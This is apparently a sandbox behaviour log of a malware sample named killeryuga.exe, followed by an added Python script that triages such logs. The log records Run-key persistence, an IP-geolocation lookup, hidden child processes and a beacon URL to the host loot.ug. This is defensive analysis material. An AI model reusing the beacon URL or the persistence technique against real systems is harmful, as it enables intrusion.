Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x76f77144 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x76b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b53eae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x76b53ed5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x76b55dee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x76b54af8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x76b53e59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x76b53f21 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x76b54642 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x76b5fd6b True 1
Fn
Module Load module_name = IPHLPAPI.DLL, base_address = 0x75090000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x75099263 True 1
Fn
Module Load module_name = WS2_32.dll, base_address = 0x76b10000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x76b1311b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x76b27673 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x76b1b131 True 1
Fn
Module Load module_name = DNSAPI.dll, base_address = 0x75030000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x7503436b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x7504572c True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x751a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74f70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x74f8c544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 05:38:51 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13229078529 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Inet Read Response size = 10240, size_out = 554 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Module Load module_name = Psapi.dll, base_address = 0x75460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
Process Enumerate Processes - True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
File Write size = 48 False 1
Fn
File Write size = 2 False 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, os_pid = 0x588, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Mutex Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, os_pid = 0x5a4, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window Create window_name = LPCWSTRszTitle, class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
Thread 0x4b4
63 8
Category Operation Information Success Count Logfile
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = loot.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://loot.ug/Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php?pid=AE2BD2A0D8075FA76A58D68C2A4634E3 True 1
Fn
Inet Read Response size = 1024, size_out = 103 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
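The rows above carry the behaviours an analyst pulls out of a report like this one: the SysHelper value read back from the HKCU Run key (persistence with an --AutoStart switch), the HTTPS request to api.2ip.ua/geo.json (a public IP/geolocation lookup before anything else happens), two copies of the sample started hidden and detached, a mutex, and a plain-HTTP GET to loot.ug whose pid parameter is a 32-hex-character token. The Python script below is an added example, not part of the VMRay report and not code from the sample: it parses rows in exactly this flattened layout (Category, Operation, "k = v" pairs, Success, Count), skips the Fn/Data logfile-link cells, extracts those behaviours, and collapses alternating OpenProcess(SYNCHRONIZE)/Sleep(1 ms) pairs such as the ones in thread 0x4e8 into a single finding with a repeat count. The sample rows are constructed copies of rows from this report; the list of geolocation hosts, the SW_HIDE plus CREATE_DETACHED_PROCESS rule, the repeat threshold and the 32-hex heuristic are assumptions of the example (the log shows the token has MD5 length, not that it is an MD5).

```python
# Triage of flattened VMRay-style API log rows (added example, not part of the report).
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample: rows copied in shape from this report (logfile-link cells already dropped).
SAMPLE_LOG = r"""
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, os_pid = 0x588, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Mutex Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Inet Open Connection protocol = http, server_name = loot.ug, server_port = 80 True 1
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://loot.ug/Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php?pid=AE2BD2A0D8075FA76A58D68C2A4634E3 True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
"""
# Public IP/geolocation lookup hosts (hand-maintained assumption, not taken from the report).
GEO_LOOKUP_HOSTS = {"api.2ip.ua", "api.ipify.org", "ip-api.com", "ifconfig.me", "icanhazip.com"}
ROW_RE = re.compile(r"^(?P<body>.*?) (?P<ok>True|False) (?P<count>\d+)$")
FIRST_KEY_RE = re.compile(r"\b(\w+) = ")   # where the Information column begins
KEY_RE = re.compile(r"(?:^|, )(\w+) = ")    # "k = v" separators inside Information

@dataclass(frozen=True)
class Entry:
    category: str
    operation: str
    info: str
    success: bool
    count: int

    def fields(self) -> Dict[str, str]:
        # Split "k1 = v1, k2 = v2" into a dict; a value may itself contain ", " (flag lists).
        keys = list(KEY_RE.finditer(self.info))
        out: Dict[str, str] = {}
        for i, m in enumerate(keys):
            end = keys[i + 1].start() if i + 1 < len(keys) else len(self.info)
            out[m.group(1)] = self.info[m.end():end].strip()
        return out

def parse_line(line: str) -> Optional[Entry]:
    # One row -> Entry; None for "Fn"/"Data" link cells, column headers and thread rows.
    if not (m := ROW_RE.match(line.strip())):
        return None
    category, _, rest = m.group("body").partition(" ")
    k = FIRST_KEY_RE.search(rest)
    operation, info = (rest[:k.start()].strip(), rest[k.start():]) if k else (rest.rstrip(" -"), "")
    return Entry(category, operation, info, m.group("ok") == "True", int(m.group("count")))

def parse_log(text: str) -> List[Entry]:
    return [e for e in map(parse_line, text.splitlines()) if e is not None]

def two_step_loops(entries: List[Entry], min_repeats: int) -> List[str]:
    # Collapse A,B,A,B,... runs (here OpenProcess(SYNCHRONIZE) + Sleep(1 ms)) into one finding.
    found, i = [], 0
    while i + 3 < len(entries):
        a, b, n = entries[i], entries[i + 1], 1
        while i + 2 * n + 1 < len(entries) and entries[i + 2 * n] == a and entries[i + 2 * n + 1] == b:
            n += 1
        if a != b and n >= min_repeats:
            found.append(f"{a.category} {a.operation} [{a.info}] / {b.category} {b.operation} [{b.info}] x{n}")
            i += 2 * n
        else:
            i += 1
    return found

def triage(entries: List[Entry], min_loop_repeats: int = 50) -> Dict[str, List[str]]:
    # Pull the behaviours an analyst wants out of the row stream (threshold is an assumption).
    r: Dict[str, List[str]] = {k: [] for k in ("persistence", "destinations", "geo_lookups", "beacon_ids", "hidden_children", "mutexes")}
    for e in entries:
        f = e.fields()
        if e.category == "Registry" and "value_name" in f and "\\CurrentVersion\\Run" in f.get("reg_name", ""):
            r["persistence"].append(f"{f['value_name']} = {f['data']}")
        elif e.category == "Inet" and e.operation == "Open Connection":
            r["destinations"].append(f"{f['protocol']}://{f['server_name']}:{f['server_port']}")
        elif e.category == "Inet" and "url" in f:
            u = urlsplit(f["url"])
            if u.hostname in GEO_LOOKUP_HOSTS:
                r["geo_lookups"].append(f["url"])
            for key, vals in parse_qs(u.query).items():
                for v in vals:
                    if re.fullmatch(r"[0-9A-Fa-f]{32}", v):   # MD5-length token; the log does not prove it is an MD5
                        r["beacon_ids"].append(f"{u.hostname}{u.path} {key}={v}")
        elif e.category == "Process" and e.operation == "Create":
            if "SW_HIDE" in f.get("show_window", "") and "CREATE_DETACHED_PROCESS" in f.get("creation_flags", ""):
                r["hidden_children"].append(f"{f['process_name']} (pid {f['os_pid']})")
        elif e.category == "Mutex" and e.operation == "Create":
            r["mutexes"].append(f["mutex_name"])
    r["polling_loops"] = two_step_loops(entries, min_loop_repeats)
    return r

if __name__ == "__main__":
    print(triage(parse_log(SAMPLE_LOG), min_loop_repeats=3))
```

To run it against a full export, paste the thread's rows into SAMPLE_LOG (or read them from a file) and leave min_loop_repeats at its default; the sample passes 3 only because it carries three OpenProcess/Sleep pairs, whereas thread 0x4e8 in this report repeats the pair well over a hundred times. Because fields() splits on ", key = " rather than on every comma, multi-valued columns such as creation_flags survive intact, which is what makes the SW_HIDE plus CREATE_DETACHED_PROCESS rule reliable.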
Thread 0x4e8
323 0
Category Operation Information Success Count Logfile
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
(these two rows alternate 144 times in this part of thread 0x4e8: the thread repeatedly opens a process handle with SYNCHRONIZE access and sleeps 1 ms between iterations)
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
Thread 0x5b0
139 0
Category Operation Information Success Count Logfile
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
